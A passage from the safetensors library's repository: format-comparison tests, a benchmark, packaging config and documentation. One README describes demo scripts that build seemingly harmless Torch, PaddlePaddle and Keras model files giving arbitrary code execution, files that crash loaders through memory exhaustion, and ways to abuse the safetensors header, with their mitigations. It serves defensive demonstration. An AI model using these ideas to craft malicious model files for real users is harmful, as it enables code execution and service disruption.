key in g.keys(): 28 | loaded[key] = g.get_tensor(key) 29 | self.assertTensorEqual(tensors, loaded, np.allclose) 30 | 31 | def test_fsspec(self): 32 | import fsspec 33 | 34 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 35 | 36 | fs = fsspec.filesystem("file") 37 | byts = save(tensors) 38 | with fs.open("fs.safetensors", "wb") as f: 39 | f.write(byts) 40 | # Now loading 41 | loaded = {} 42 | with fs.open("fs.safetensors", "rb") as f: 43 | with _safe_open_handle(f, framework="np", device="cpu") as g: 44 | for key in g.keys(): 45 | loaded[key] = g.get_tensor(key) 46 | self.assertTensorEqual(tensors, loaded, np.allclose) 47 | 48 | @unittest.skip("Will not work without s3 access") 49 | def test_fsspec_s3(self): 50 | import s3fs 51 | 52 | tensors = {"a": np.zeros((2, 2)), "b": np.zeros((2, 3), dtype=np.uint8)} 53 | 54 | s3 = s3fs.S3FileSystem(anon=True) 55 | byts = save(tensors) 56 | print(s3.ls("my-bucket")) 57 | with s3.open("out/fs.safetensors", "wb") as f: 58 | f.write(byts) 59 | # Now loading 60 | loaded = {} 61 | with s3.open("out/fs.safetensors", "rb") as f: 62 | with _safe_open_handle(f, framework="np", device="cpu") as g: 63 | for key in g.keys(): 64 | loaded[key] = g.get_tensor(key) 65 | self.assertTensorEqual(tensors, loaded, np.allclose) 66 | -------------------------------------------------------------------------------- /bindings/python/tests/test_mlx_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | 4 | 5 | HAS_MLX = False 6 | if platform.system() == "Darwin": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | try: 10 | import mlx.core as mx 11 | 12 | HAS_MLX = True 13 | except ImportError: 14 | pass 15 | if HAS_MLX: 16 | from safetensors import safe_open 17 | from safetensors.mlx import load_file, save_file 18 | 19 | 20 | # MLX only exists on Mac 21 | @unittest.skipIf(platform.system() != "Darwin", "Mlx is not available on non Mac") 22 | @unittest.skipIf(not HAS_MLX, "Mlx is not available.") 23 | class LoadTestCase(unittest.TestCase): 24 | def setUp(self): 25 | data = { 26 | "test": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 27 | "test2": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 28 | "test3": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32), 29 | "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.float32).astype( 30 | mx.complex64 31 | ), 32 | # This doesn't work because bfloat16 is not implemented 33 | # with similar workarounds as jax/tensorflow. 
34 | # https://github.com/ml-explore/mlx/issues/1296 35 | # "test4": mx.random.uniform(shape=(1024, 1024), dtype=mx.bfloat16), 36 | } 37 | self.mlx_filename = "./tests/data/mlx_load.npz" 38 | self.sf_filename = "./tests/data/mlx_load.safetensors" 39 | 40 | mx.savez(self.mlx_filename, **data) 41 | save_file(data, self.sf_filename) 42 | 43 | def test_zero_sized(self): 44 | data = { 45 | "test": mx.zeros((2, 0), dtype=mx.float32), 46 | } 47 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 48 | save_file(data.copy(), local) 49 | reloaded = load_file(local) 50 | # Empty tensor != empty tensor on numpy, so comparing shapes 51 | # instead 52 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 53 | 54 | def test_deserialization_safe(self): 55 | weights = load_file(self.sf_filename) 56 | 57 | mlx_weights = mx.load(self.mlx_filename) 58 | 59 | for k, v in weights.items(): 60 | tv = mlx_weights[k] 61 | self.assertTrue(mx.allclose(v, tv)) 62 | 63 | def test_deserialization_safe_open(self): 64 | weights = {} 65 | with safe_open(self.sf_filename, framework="mlx") as f: 66 | for k in f.keys(): 67 | weights[k] = f.get_tensor(k) 68 | 69 | mlx_weights = mx.load(self.mlx_filename) 70 | 71 | for k, v in weights.items(): 72 | tv = mlx_weights[k] 73 | self.assertTrue(mx.allclose(v, tv)) 74 | -------------------------------------------------------------------------------- /bindings/python/benches/test_tf.py: -------------------------------------------------------------------------------- 1 | import os 2 | import tempfile 3 | 4 | import h5py 5 | import numpy as np 6 | import tensorflow as tf 7 | 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(filename, tensors=None, prefix=""): 12 | with h5py.File(filename, "r") as f: 13 | if tensors is None: 14 | tensors = {} 15 | for k in f.keys(): 16 | if isinstance(f[k], h5py._hl.dataset.Dataset): 17 | key = k if not prefix else f"{prefix}_{k}" 18 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 19 | else: 20 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 21 | return tensors 22 | 23 | 24 | def _save(filename, tensors, prefix=""): 25 | with h5py.File(filename, "w") as f: 26 | for name, tensor in tensors.items(): 27 | tensor = tensor.numpy() 28 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 29 | dset[:] = tensor 30 | 31 | 32 | def create_gpt2(n_layers: int): 33 | tensors = {} 34 | tensors["wte"] = tf.zeros((50257, 768)) 35 | tensors["wpe"] = tf.zeros((1024, 768)) 36 | for i in range(n_layers): 37 | tensors[f"h.{i}.ln_1.weight"] = tf.zeros((768,)) 38 | tensors[f"h.{i}.ln_1.bias"] = tf.zeros((768,)) 39 | tensors[f"h.{i}.attn.bias"] = tf.zeros((1, 1, 1024, 1024)) 40 | tensors[f"h.{i}.attn.c_attn.weight"] = tf.zeros((768, 2304)) 41 | tensors[f"h.{i}.attn.c_attn.bias"] = tf.zeros((2304)) 42 | tensors[f"h.{i}.attn.c_proj.weight"] = tf.zeros((768, 768)) 43 | tensors[f"h.{i}.attn.c_proj.bias"] = tf.zeros((768)) 44 | tensors[f"h.{i}.ln_2.weight"] = tf.zeros((768)) 45 | tensors[f"h.{i}.ln_2.bias"] = tf.zeros((768)) 46 | tensors[f"h.{i}.mlp.c_fc.weight"] = tf.zeros((768, 3072)) 47 | tensors[f"h.{i}.mlp.c_fc.bias"] = tf.zeros((3072)) 48 | tensors[f"h.{i}.mlp.c_proj.weight"] = tf.zeros((3072, 768)) 49 | tensors[f"h.{i}.mlp.c_proj.bias"] = tf.zeros((768)) 50 | tensors["ln_f.weight"] = tf.zeros((768)) 51 | tensors["ln_f.bias"] = tf.zeros((768)) 52 | return tensors 53 | 54 | 55 | def test_tf_tf_load(benchmark): 56 | # benchmark something 57 | weights = create_gpt2(12) 58 | with 
tempfile.NamedTemporaryFile(delete=False) as f: 59 | _save(f.name, weights) 60 | result = benchmark(_load, f.name) 61 | os.unlink(f.name) 62 | 63 | for k, v in weights.items(): 64 | tv = result[k] 65 | assert np.allclose(v, tv) 66 | 67 | 68 | def test_tf_sf_load(benchmark): 69 | # benchmark something 70 | weights = create_gpt2(12) 71 | with tempfile.NamedTemporaryFile(delete=False) as f: 72 | save_file(weights, f.name) 73 | result = benchmark(load_file, f.name) 74 | os.unlink(f.name) 75 | 76 | for k, v in weights.items(): 77 | tv = result[k] 78 | assert np.allclose(v, tv) 79 | -------------------------------------------------------------------------------- /bindings/python/tests/test_flax_comparison.py: -------------------------------------------------------------------------------- 1 | import platform 2 | import unittest 3 | import sys 4 | 5 | 6 | if platform.system() != "Windows": 7 | # This platform is not supported, we don't want to crash on import 8 | # This test will be skipped anyway. 9 | import jax.numpy as jnp 10 | from jax import random 11 | from flax.serialization import msgpack_restore, msgpack_serialize 12 | from safetensors import safe_open 13 | from safetensors.flax import load_file, save_file 14 | 15 | 16 | # Jax doesn't not exist on Windows 17 | @unittest.skipIf(platform.system() == "Windows", "Flax is not available on Windows") 18 | class LoadTestCase(unittest.TestCase): 19 | def setUp(self): 20 | key = random.key(0) 21 | data = { 22 | "test": random.normal(key, (1024, 1024), dtype=jnp.float32), 23 | "test2": random.normal(key, (1024, 1024), dtype=jnp.float16), 24 | "test3": random.normal(key, (1024, 1024), dtype=jnp.bfloat16), 25 | "test4": random.normal(key, (1024, 1024), dtype=jnp.complex64), 26 | } 27 | self.flax_filename = "./tests/data/flax_load.msgpack" 28 | self.sf_filename = "./tests/data/flax_load.safetensors" 29 | 30 | serialized = msgpack_serialize(data) 31 | with open(self.flax_filename, "wb") as f: 32 | f.write(serialized) 33 | 34 | save_file(data, self.sf_filename) 35 | 36 | def test_zero_sized(self): 37 | data = { 38 | "test": jnp.zeros((2, 0), dtype=jnp.float32), 39 | } 40 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 41 | save_file(data.copy(), local) 42 | reloaded = load_file(local) 43 | # Empty tensor != empty tensor on numpy, so comparing shapes 44 | # instead 45 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 46 | 47 | def test_deserialization_safe(self): 48 | weights = load_file(self.sf_filename) 49 | 50 | with open(self.flax_filename, "rb") as f: 51 | data = f.read() 52 | flax_weights = msgpack_restore(data) 53 | 54 | for k, v in weights.items(): 55 | tv = flax_weights[k] 56 | self.assertTrue(jnp.allclose(v, tv)) 57 | 58 | def test_deserialization_safe_open(self): 59 | weights = {} 60 | with safe_open(self.sf_filename, framework="flax") as f: 61 | for k in f.keys(): 62 | weights[k] = f.get_tensor(k) 63 | 64 | with open(self.flax_filename, "rb") as f: 65 | data = f.read() 66 | flax_weights = msgpack_restore(data) 67 | 68 | for k, v in weights.items(): 69 | tv = flax_weights[k] 70 | self.assertTrue(jnp.allclose(v, tv)) 71 | 72 | def test_loading_without_ml_dtype(self): 73 | # This does not work as we cannot unload 74 | # modules, copy this into its own file to test. 
75 | # https://github.com/huggingface/safetensors/issues/598 76 | sys.modules.pop("ml_dtypes", None) 77 | with safe_open(self.sf_filename, framework="flax") as f: 78 | f.get_tensor("test3") 79 | -------------------------------------------------------------------------------- /bindings/python/pyproject.toml: -------------------------------------------------------------------------------- 1 | [project] 2 | name = 'safetensors' 3 | requires-python = '>=3.9' 4 | authors = [ 5 | {name = 'Nicolas Patry', email = 'patry.nicolas@protonmail.com'} 6 | ] 7 | classifiers = [ 8 | "Development Status :: 5 - Production/Stable", 9 | "Intended Audience :: Developers", 10 | "Intended Audience :: Education", 11 | "Intended Audience :: Science/Research", 12 | "License :: OSI Approved :: Apache Software License", 13 | "Operating System :: OS Independent", 14 | "Programming Language :: Python :: 3", 15 | "Programming Language :: Python :: 3.7", 16 | "Programming Language :: Python :: 3.8", 17 | "Programming Language :: Python :: 3.9", 18 | "Programming Language :: Python :: 3.10", 19 | "Topic :: Scientific/Engineering :: Artificial Intelligence", 20 | "Typing :: Typed", 21 | ] 22 | license = { file = "LICENSE" } 23 | dynamic = [ 24 | 'description', 25 | 'readme', 26 | 'version', 27 | ] 28 | 29 | [project.urls] 30 | Homepage = 'https://github.com/huggingface/safetensors' 31 | Source = 'https://github.com/huggingface/safetensors' 32 | 33 | [project.optional-dependencies] 34 | numpy = ["numpy>=1.21.6"] 35 | torch = [ 36 | "packaging", 37 | "safetensors[numpy]", 38 | "torch>=1.10", 39 | ] 40 | tensorflow = [ 41 | "safetensors[numpy]", 42 | "tensorflow>=2.11.0", 43 | ] 44 | # pinning tf version 2.11.0 for doc-builder 45 | pinned-tf = [ 46 | "safetensors[numpy]", 47 | "tensorflow==2.18.0", 48 | ] 49 | jax = [ 50 | "safetensors[numpy]", 51 | "flax>=0.6.3", 52 | "jax>=0.3.25", 53 | "jaxlib>=0.3.25", 54 | ] 55 | mlx = [ 56 | "mlx>=0.0.9", 57 | ] 58 | paddlepaddle = [ 59 | "safetensors[numpy]", 60 | "paddlepaddle>=2.4.1", 61 | ] 62 | quality = [ 63 | "ruff", # after updating to black 2023, also update Python version in pyproject.toml to 3.7 64 | ] 65 | testing = [ 66 | "safetensors[numpy]", 67 | "h5py>=3.7.0", 68 | "huggingface_hub>=0.12.1", 69 | "setuptools_rust>=1.5.2", 70 | "pytest>=7.2.0", 71 | "pytest-benchmark>=4.0.0", 72 | # "python-afl>=0.7.3", 73 | "hypothesis>=6.70.2", 74 | ] 75 | testingfree = [ 76 | "safetensors[numpy]", 77 | "huggingface_hub>=0.12.1", 78 | "setuptools_rust>=1.5.2", 79 | "pytest>=7.2.0", 80 | "pytest-benchmark>=4.0.0", 81 | # "python-afl>=0.7.3", 82 | "hypothesis>=6.70.2", 83 | ] 84 | all = [ 85 | "safetensors[torch]", 86 | "safetensors[numpy]", 87 | "safetensors[pinned-tf]", 88 | "safetensors[jax]", 89 | "safetensors[paddlepaddle]", 90 | "safetensors[quality]", 91 | "safetensors[testing]", 92 | ] 93 | dev = [ 94 | "safetensors[all]", 95 | ] 96 | 97 | 98 | [build-system] 99 | requires = ["maturin>=1.0,<2.0"] 100 | build-backend = "maturin" 101 | 102 | [tool.maturin] 103 | python-source = "py_src" 104 | module-name = "safetensors._safetensors_rust" 105 | bindings = 'pyo3' 106 | features = ["pyo3/extension-module"] 107 | 108 | [tool.black] 109 | line-length = 119 110 | target-version = ['py35'] 111 | 112 | [tool.setuptools.dynamic] 113 | readme = {file = ["README.rst"]} 114 | -------------------------------------------------------------------------------- /attacks/README.md: -------------------------------------------------------------------------------- 1 | The purpose of this directory is to 
showcase various attacks (and how to create your own). 2 | 3 | 4 | # Torch Arbitrary code execution 5 | 6 | Try it out. This will create a seemingly innocuous `torch_ace.pt` file. 7 | ``` 8 | python torch_ace_create.py 9 | python torch_ace_get_pwned.py 10 | ``` 11 | 12 | # PaddlePaddle Arbitrary code execution 13 | 14 | Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file. 15 | ``` 16 | python paddle_ace_create.py 17 | python paddle_ace_get_pwned.py 18 | ``` 19 | 20 | # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`) 21 | 22 | Try it out. This will create a seemingly innocuous `tf_ace.h5` file. 23 | ``` 24 | python tf_ace_create.py 25 | python tf_ace_get_pwned.py 26 | ``` 27 | 28 | # Torch Denial of Service (OOM kills the running process) 29 | 30 | Try it out. This will create a seemingly innocuous `torch_dos.pt` file. 31 | ``` 32 | python torch_dos_create.py 33 | python torch_dos_get_pwned.py 34 | ``` 35 | 36 | # Numpy Denial of Service (OOM kills the running process) 37 | 38 | Try it out. This will create a seemingly innocuous `numpy_dos.npz` file. 39 | ``` 40 | python numpy_dos_create.py 41 | python numpy_dos_get_pwned.py 42 | ``` 43 | 44 | # Safetensors abuse attempts 45 | 46 | In order to try and check the limits, we also try to abuse the current format. 47 | Please send ideas! 48 | 49 | A few things can be abused: 50 | - Proposal 1: The initial 8 bytes, which could declare a header size bigger than the file itself. This crashes, and crashes early (Out of bounds) (Attempt #1). 51 | - Proposal 2: The initial header is JSON, so an attacker could use a 4GB JSON file to delay the loads. Debatable how much of an attack this is, but at least 52 | it's impossible to "bomb" (like the DOS attacks above), where the files are vastly smaller than their expanded version (because of zip abuse). 53 | Various "protections" could be put in place, like a header proportion cap (the header should always be much smaller than the file). (Attempt #2) 54 | - Proposal 3: The offsets could be negative or point outside the file. This all crashes by default. 55 | - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok. 56 | While testing Proposal 2, I realized that the tensors themselves were all allocated, which gave me an idea for a DOS exploit where you would have a relatively small 57 | file, a few megs tops, but by defining many tensors on the same overlapping part of the file it would essentially be a DOS attack. The mitigation is rather simple: we validate 58 | that the offsets must be contiguous and non-overlapping (see the sketch after this list). 59 | - Proposal 5: The offsets could mismatch the declared shapes + dtype. This is validated against. 60 | - Proposal 6: The file being mmaped could be modified while it's opened (but if an attacker has access to your filesystem, you're already pwned). 61 | - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual compiled Rust binary.
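To make the Proposal 4 mitigation concrete, here is a minimal sketch of that kind of check, written in Python purely for illustration (the real validation lives in the Rust core); the `check_offsets` helper and the header-size cap value are hypothetical:

```python
import json
import struct


def check_offsets(path, max_header_bytes=100_000_000):
    """Reject files whose tensor offsets are not contiguous and non-overlapping."""
    with open(path, "rb") as f:
        # First 8 bytes: size of the JSON header (Proposal 1 / Proposal 2 territory).
        (header_len,) = struct.unpack("<Q", f.read(8))
        if header_len > max_header_bytes:
            raise ValueError("header is suspiciously large")
        header = json.loads(f.read(header_len))

    header.pop("__metadata__", None)
    expected_start = 0
    # Proposal 4 mitigation: the offsets must tile the byte buffer exactly.
    for start, end in sorted(v["data_offsets"] for v in header.values()):
        if start != expected_start or end < start:
            raise ValueError("offsets must be contiguous and non-overlapping")
        expected_start = end
```

Overlapping or gapped offsets fail immediately, which is exactly what stops the small-file / huge-allocation DOS described in Proposal 4.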
62 | 63 | ``` 64 | python safetensors_abuse_attempt_1.py 65 | python safetensors_abuse_attempt_2.py 66 | python safetensors_abuse_attempt_3.py 67 | ``` 68 | -------------------------------------------------------------------------------- /bindings/python/tests/test_tf_comparison.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | 3 | import h5py 4 | import numpy as np 5 | import tensorflow as tf 6 | 7 | from safetensors import safe_open 8 | from safetensors.tensorflow import load_file, save_file 9 | 10 | 11 | def _load(f, tensors=None, prefix=""): 12 | if tensors is None: 13 | tensors = {} 14 | for k in f.keys(): 15 | if isinstance(f[k], h5py._hl.dataset.Dataset): 16 | key = k if not prefix else f"{prefix}_{k}" 17 | tensors[key] = tf.convert_to_tensor(np.array(f[k])) 18 | else: 19 | tensors.update(_load(f[k], tensors, prefix=f"{prefix}_{k}")) 20 | return tensors 21 | 22 | 23 | def _save(f, tensors, prefix=""): 24 | for name, tensor in tensors.items(): 25 | tensor = tensor.numpy() 26 | dset = f.create_dataset(name, tensor.shape, dtype=tensor.dtype) 27 | dset[:] = tensor 28 | 29 | 30 | class SafeTestCase(unittest.TestCase): 31 | def setUp(self): 32 | data = { 33 | "test": tf.zeros((1024, 1024), dtype=tf.float32), 34 | "test2": tf.zeros((1024, 1024), dtype=tf.float32), 35 | "test3": tf.zeros((1024, 1024), dtype=tf.float32), 36 | "test4": tf.zeros((1024, 1024), dtype=tf.complex64), 37 | } 38 | self.tf_filename = "./tests/data/tf_load.h5" 39 | self.sf_filename = "./tests/data/tf_load.safetensors" 40 | 41 | with h5py.File(self.tf_filename, "w") as f: 42 | _save(f, data) 43 | save_file(data, self.sf_filename) 44 | 45 | def test_zero_sized(self): 46 | data = { 47 | "test": tf.zeros((2, 0), dtype=tf.float32), 48 | } 49 | local = "./tests/data/out_safe_flat_mmap_small2.safetensors" 50 | save_file(data.copy(), local) 51 | reloaded = load_file(local) 52 | # Empty tensor != empty tensor on numpy, so comparing shapes 53 | # instead 54 | self.assertEqual(data["test"].shape, reloaded["test"].shape) 55 | 56 | def test_deserialization_safe(self): 57 | weights = load_file(self.sf_filename) 58 | 59 | with h5py.File(self.tf_filename, "r") as f: 60 | tf_weights = _load(f) 61 | 62 | for k, v in weights.items(): 63 | tv = tf_weights[k] 64 | self.assertTrue(np.allclose(v, tv)) 65 | 66 | def test_bfloat16(self): 67 | data = { 68 | "test": tf.random.normal((1024, 1024), dtype=tf.bfloat16), 69 | } 70 | save_file(data, self.sf_filename) 71 | weights = {} 72 | with safe_open(self.sf_filename, framework="tf") as f: 73 | for k in f.keys(): 74 | weights[k] = f.get_tensor(k) 75 | 76 | for k, v in weights.items(): 77 | tv = data[k] 78 | self.assertTrue(tf.experimental.numpy.allclose(v, tv)) 79 | 80 | def test_deserialization_safe_open(self): 81 | weights = {} 82 | with safe_open(self.sf_filename, framework="tf") as f: 83 | for k in f.keys(): 84 | weights[k] = f.get_tensor(k) 85 | 86 | with h5py.File(self.tf_filename, "r") as f: 87 | tf_weights = _load(f) 88 | 89 | for k, v in weights.items(): 90 | tv = tf_weights[k] 91 | self.assertTrue(np.allclose(v, tv)) 92 | -------------------------------------------------------------------------------- /docs/source/speed.mdx: -------------------------------------------------------------------------------- 1 | # Speed Comparison 2 | 3 | 4 | Open In Colab 9 | 10 | 11 | `Safetensors` is really fast. Let's compare it against `PyTorch` by loading [gpt2](https://huggingface.co/gpt2) weights. 
To run the [GPU benchmark](#gpu-benchmark), make sure your machine has GPU or you have selected `GPU runtime` if you are using Google Colab. 12 | 13 | Before you begin, make sure you have all the necessary libraries installed: 14 | 15 | ```bash 16 | pip install safetensors huggingface_hub torch 17 | ``` 18 | 19 | Let's start by importing all the packages that will be used: 20 | 21 | ```py 22 | >>> import os 23 | >>> import datetime 24 | >>> from huggingface_hub import hf_hub_download 25 | >>> from safetensors.torch import load_file 26 | >>> import torch 27 | ``` 28 | 29 | Download safetensors & torch weights for gpt2: 30 | 31 | ```py 32 | >>> sf_filename = hf_hub_download("gpt2", filename="model.safetensors") 33 | >>> pt_filename = hf_hub_download("gpt2", filename="pytorch_model.bin") 34 | ``` 35 | 36 | ### CPU benchmark 37 | 38 | ```py 39 | >>> start_st = datetime.datetime.now() 40 | >>> weights = load_file(sf_filename, device="cpu") 41 | >>> load_time_st = datetime.datetime.now() - start_st 42 | >>> print(f"Loaded safetensors {load_time_st}") 43 | 44 | >>> start_pt = datetime.datetime.now() 45 | >>> weights = torch.load(pt_filename, map_location="cpu") 46 | >>> load_time_pt = datetime.datetime.now() - start_pt 47 | >>> print(f"Loaded pytorch {load_time_pt}") 48 | 49 | >>> print(f"on CPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 50 | Loaded safetensors 0:00:00.004015 51 | Loaded pytorch 0:00:00.307460 52 | on CPU, safetensors is faster than pytorch by: 76.6 X 53 | ``` 54 | 55 | This speedup is due to the fact that this library avoids unnecessary copies by mapping the file directly. It is actually possible to do on [pure pytorch](https://gist.github.com/Narsil/3edeec2669a5e94e4707aa0f901d2282). 56 | The currently shown speedup was gotten on: 57 | * OS: Ubuntu 18.04.6 LTS 58 | * CPU: Intel(R) Xeon(R) CPU @ 2.00GHz 59 | 60 | 61 | ### GPU benchmark 62 | 63 | ```py 64 | >>> # This is required because this feature hasn't been fully verified yet, but 65 | >>> # it's been tested on many different environments 66 | >>> os.environ["SAFETENSORS_FAST_GPU"] = "1" 67 | 68 | >>> # CUDA startup out of the measurement 69 | >>> torch.zeros((2, 2)).cuda() 70 | 71 | >>> start_st = datetime.datetime.now() 72 | >>> weights = load_file(sf_filename, device="cuda:0") 73 | >>> load_time_st = datetime.datetime.now() - start_st 74 | >>> print(f"Loaded safetensors {load_time_st}") 75 | 76 | >>> start_pt = datetime.datetime.now() 77 | >>> weights = torch.load(pt_filename, map_location="cuda:0") 78 | >>> load_time_pt = datetime.datetime.now() - start_pt 79 | >>> print(f"Loaded pytorch {load_time_pt}") 80 | 81 | >>> print(f"on GPU, safetensors is faster than pytorch by: {load_time_pt/load_time_st:.1f} X") 82 | Loaded safetensors 0:00:00.165206 83 | Loaded pytorch 0:00:00.353889 84 | on GPU, safetensors is faster than pytorch by: 2.1 X 85 | ``` 86 | 87 | The speedup works because this library is able to skip unnecessary CPU allocations. It is unfortunately not replicable in pure pytorch as far as we know. The library works by memory mapping the file, creating the tensor empty with pytorch and calling `cudaMemcpy` directly to move the tensor directly on the GPU. 88 | The currently shown speedup was gotten on: 89 | * OS: Ubuntu 18.04.6 LTS. 
90 | * GPU: Tesla T4 91 | * Driver Version: 460.32.03 92 | * CUDA Version: 11.2 93 | -------------------------------------------------------------------------------- /docs/source/index.mdx: -------------------------------------------------------------------------------- 1 | 2 | 3 |
4 | 5 | 6 |
7 | 8 | # Safetensors 9 | 10 | Safetensors is a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). Safetensors is really [fast 🚀](./speed). 11 | 12 | ## Installation 13 | 14 | with pip: 15 | ``` 16 | pip install safetensors 17 | ``` 18 | 19 | with conda: 20 | ``` 21 | conda install -c huggingface safetensors 22 | ``` 23 | 24 | ## Usage 25 | 26 | ### Load tensors 27 | 28 | ```python 29 | from safetensors import safe_open 30 | 31 | tensors = {} 32 | with safe_open("model.safetensors", framework="pt", device=0) as f: 33 | for k in f.keys(): 34 | tensors[k] = f.get_tensor(k) 35 | ``` 36 | 37 | Loading only part of the tensors (interesting when running on multiple GPU) 38 | 39 | ```python 40 | from safetensors import safe_open 41 | 42 | tensors = {} 43 | with safe_open("model.safetensors", framework="pt", device=0) as f: 44 | tensor_slice = f.get_slice("embedding") 45 | vocab_size, hidden_dim = tensor_slice.get_shape() 46 | tensor = tensor_slice[:, :hidden_dim] 47 | ``` 48 | 49 | ### Save tensors 50 | 51 | ```python 52 | import torch 53 | from safetensors.torch import save_file 54 | 55 | tensors = { 56 | "embedding": torch.zeros((2, 2)), 57 | "attention": torch.zeros((2, 3)) 58 | } 59 | save_file(tensors, "model.safetensors") 60 | ``` 61 | 62 | ## Format 63 | 64 | Let's say you have safetensors file named `model.safetensors`, then `model.safetensors` will have the following internal format: 65 | 66 |
67 | 68 |
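As a quick way to see that layout, here is a minimal sketch that reads only the header (assuming the `model.safetensors` file saved above); this is an illustration, not an official API:

```python
import json
import struct

with open("model.safetensors", "rb") as f:
    # The first 8 bytes are a little-endian unsigned 64-bit integer: the header size N.
    (header_len,) = struct.unpack("<Q", f.read(8))
    # The next N bytes are a JSON header describing every tensor.
    header = json.loads(f.read(header_len))

# Optional free-form, string-to-string metadata.
print(header.get("__metadata__", {}))
# Every other key is a tensor name mapped to its dtype, shape and
# [begin, end) offsets into the byte buffer that follows the header.
print(header["embedding"])
```

Everything after the header is one flat byte buffer; each tensor's `data_offsets` are expressed relative to the start of that buffer.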
69 | 70 | ## Featured Projects 71 | 72 | Safetensors is being used widely at leading AI enterprises, such as [Hugging Face](https://huggingface.co/), [EleutherAI](https://www.eleuther.ai/), and [StabilityAI](https://stability.ai/). Here is a non-exhaustive list of projects that are using safetensors: 73 | 74 | * [huggingface/transformers](https://github.com/huggingface/transformers) 75 | * [ml-explore/mlx](https://github.com/ml-explore/mlx) 76 | * [huggingface/candle](https://github.com/huggingface/candle) 77 | * [AUTOMATIC1111/stable-diffusion-webui](https://github.com/AUTOMATIC1111/stable-diffusion-webui) 78 | * [Llama-cpp](https://github.com/ggerganov/llama.cpp/blob/e6a46b0ed1884c77267dc70693183e3b7164e0e0/convert.py#L537) 79 | * [microsoft/TaskMatrix](https://github.com/microsoft/TaskMatrix) 80 | * [hpcaitech/ColossalAI](https://github.com/hpcaitech/ColossalAI) 81 | * [huggingface/pytorch-image-models](https://github.com/huggingface/pytorch-image-models) 82 | * [CivitAI](https://civitai.com/) 83 | * [huggingface/diffusers](https://github.com/huggingface/diffusers) 84 | * [coreylowman/dfdx](https://github.com/coreylowman/dfdx) 85 | * [invoke-ai/InvokeAI](https://github.com/invoke-ai/InvokeAI) 86 | * [oobabooga/text-generation-webui](https://github.com/oobabooga/text-generation-webui) 87 | * [Sanster/lama-cleaner](https://github.com/Sanster/lama-cleaner) 88 | * [PaddlePaddle/PaddleNLP](https://github.com/PaddlePaddle/PaddleNLP) 89 | * [AIGC-Audio/AudioGPT](https://github.com/AIGC-Audio/AudioGPT) 90 | * [brycedrennan/imaginAIry](https://github.com/brycedrennan/imaginAIry) 91 | * [comfyanonymous/ComfyUI](https://github.com/comfyanonymous/ComfyUI) 92 | * [LianjiaTech/BELLE](https://github.com/LianjiaTech/BELLE) 93 | * [alvarobartt/safejax](https://github.com/alvarobartt/safejax) 94 | * [MaartenGr/BERTopic](https://github.com/MaartenGr/BERTopic) 95 | * [rachthree/safestructures](https://github.com/rachthree/safestructures) 96 | * [justinchuby/onnx-safetensors](https://github.com/justinchuby/onnx-safetensors) 97 | -------------------------------------------------------------------------------- /bindings/python/tests/test_threadable.py: -------------------------------------------------------------------------------- 1 | import unittest 2 | from concurrent import futures 3 | import threading 4 | import numpy as np 5 | from safetensors import serialize_file 6 | from safetensors.numpy import load_file 7 | import time 8 | import os 9 | 10 | 11 | class TestCase(unittest.TestCase): 12 | def test_serialize_file_releases_gil(self): 13 | """Test that serialize_file releases the GIL and can run concurrently.""" 14 | # Create large numpy arrays to ensure serialization takes measurable time 15 | # Keep them alive throughout the test since we pass raw pointers 16 | tensor_a = np.random.randn(2000, 20000).astype(np.float32) 17 | tensor_b = np.random.randint(0, 128, (20000, 2000), dtype=np.int8) 18 | 19 | # Build the tensor dict with data pointers (as serialize_file expects) 20 | tensor_data = { 21 | "tensor_a": { 22 | "dtype": tensor_a.dtype.name, 23 | "shape": tensor_a.shape, 24 | "data_ptr": tensor_a.ctypes.data, 25 | "data_len": tensor_a.nbytes, 26 | }, 27 | "tensor_b": { 28 | "dtype": tensor_b.dtype.name, 29 | "shape": tensor_b.shape, 30 | "data_ptr": tensor_b.ctypes.data, 31 | "data_len": tensor_b.nbytes, 32 | }, 33 | } 34 | 35 | num_threads = 4 36 | results = {} 37 | barrier = threading.Barrier(num_threads) 38 | file_names = [f"tmp_thread_{i}.safetensors" for i in range(num_threads)] 39 | 40 | def 
saving_thread(thread_id): 41 | file_name = file_names[thread_id] 42 | # Wait for all threads to be ready 43 | barrier.wait() 44 | start_time = time.monotonic() 45 | serialize_file(tensor_data, file_name) 46 | end_time = time.monotonic() 47 | results[thread_id] = (start_time, end_time) 48 | 49 | try: 50 | # Run multiple serialize_file calls concurrently 51 | with futures.ThreadPoolExecutor(max_workers=num_threads) as executor: 52 | futs = [executor.submit(saving_thread, i) for i in range(num_threads)] 53 | for f in futs: 54 | f.result() # Raise any exceptions 55 | 56 | # Verify all threads completed 57 | self.assertEqual(len(results), num_threads) 58 | 59 | # Check that the threads actually ran concurrently by verifying 60 | # their execution windows overlap. If the GIL was held, threads 61 | # would run sequentially with no overlap. 62 | all_starts = [r[0] for r in results.values()] 63 | all_ends = [r[1] for r in results.values()] 64 | 65 | # The latest start should be before the earliest end if threads overlapped 66 | latest_start = max(all_starts) 67 | earliest_end = min(all_ends) 68 | 69 | # If GIL is released, threads run in parallel so latest_start < earliest_end 70 | # If GIL is NOT released, threads run sequentially so latest_start >= earliest_end 71 | self.assertLess( 72 | latest_start, 73 | earliest_end, 74 | f"Threads did not run 